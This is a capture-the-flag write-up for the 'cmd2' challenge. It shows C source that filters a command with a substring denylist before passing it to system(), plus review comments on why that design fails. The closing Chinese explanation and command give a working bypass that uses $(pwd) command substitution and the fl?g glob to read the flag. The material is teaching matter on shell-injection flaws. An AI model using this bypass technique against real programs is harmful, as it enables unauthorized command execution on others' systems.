PWNABLE——cmd2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

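/*
 * filter - substring denylist applied to the command string before it is run.
 *
 * Counts how many of six fixed substrings ("=", "PATH", "export", "/", "`",
 * "flag") occur anywhere in cmd. Matching is done with strstr(), so it is
 * case-sensitive and looks only at the literal bytes of the argument.
 *
 * Returns 0 when none of the substrings is present, otherwise the number of
 * distinct patterns that matched (1..6). A NULL cmd is reported as rejected
 * (returns 1): main() forwards argv[1] without checking argc, and calling
 * strstr() on a NULL pointer is undefined behaviour.
 *
 * Security note: this is not a security boundary. main() hands the accepted
 * string to system(), and the shell started there performs its expansions
 * after this check has run, so the text that is finally executed can contain
 * characters that were absent from the string inspected here. A denylist of
 * substrings cannot enumerate what a shell can produce; the robust fix is an
 * allowlist of permitted operations executed without a shell.
 */
int filter(char* cmd){
        static const char *const blocked[] = {
                "=", "PATH", "export", "/", "`", "flag"
        };
        int r = 0;
        size_t i;

        /* Missing argument: reject instead of dereferencing NULL. */
        if (cmd == NULL)
                return 1;

        for (i = 0; i < sizeof blocked / sizeof blocked[0]; i++)
                r += strstr(cmd, blocked[i]) != NULL;

        return r;
}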

extern char** environ;

/*
 * delete_env - blank out every string reachable from environ.
 *
 * Each entry is overwritten in place with zero bytes over its current length.
 * The pointer array itself is left untouched, so the entries are not removed:
 * they remain in environ as empty strings.
 */
void delete_env(){
        char** entry = environ;

        while (*entry != NULL) {
                char* text = *entry;

                memset(text, 0, strlen(text));
                entry++;
        }
}

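/*
 * Entry point: scrub the inherited environment, replace PATH, run argv[1]
 * through filter(), and pass it to system() only if nothing matched.
 *
 * Always returns 0, whether the command was rejected, missing, or executed.
 *
 * NOTE(review): the only controls here are the scrubbed environment, the
 * replaced PATH and the substring denylist in filter(). system() passes the
 * string to a shell, which interprets it after filter() has inspected it, so
 * the denylist sees a different text from the one that is executed. Running
 * attacker-influenced input through system() is the underlying design flaw;
 * hardening means no shell at all: map the request onto an allowlist and
 * start the program with an explicit argv (execve / posix_spawn).
 */
int main(int argc, char* argv[], char** envp){
        /* Blank the inherited environment strings before anything else runs. */
        delete_env();

        /* Point command lookup at a directory that is presumably absent, so a
         * bare program name cannot be resolved through PATH. */
        putenv("PATH=/no_command_execution_until_you_become_a_hacker");

        /* argv[1] is NULL when no argument was given; the original code passed
         * it straight to strstr(), printf("%s") and system(). */
        if(argc < 2) return 0;

        if(filter(argv[1])) return 0;
        printf("%s\n", argv[1]);

        /* The accepted string is interpreted by a shell at this point. */
        system( argv[1] );
        return 0;
}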

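本题的关键在于绕过对 '/' 的过滤。$(pwd) 并不是环境变量,而是命令替换:filter() 只检查 argv[1] 的字面内容,而 system() 启动的 shell 在检查之后才进行展开,因此当前工作目录为 '/' 时,$(pwd) 会被替换成 '/';再结合通配符,即可绕过对 "flag" 的过滤。这也说明基于子串的黑名单不能作为安全边界,修复思路是不要把用户输入交给 shell 执行。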

cd /
echo $(pwd)    # 此时 $(pwd) 的输出是当前工作目录,即 '/'
/home/cmd2/cmd2 '$(pwd)home$(pwd)cmd2$(pwd)fl?g'
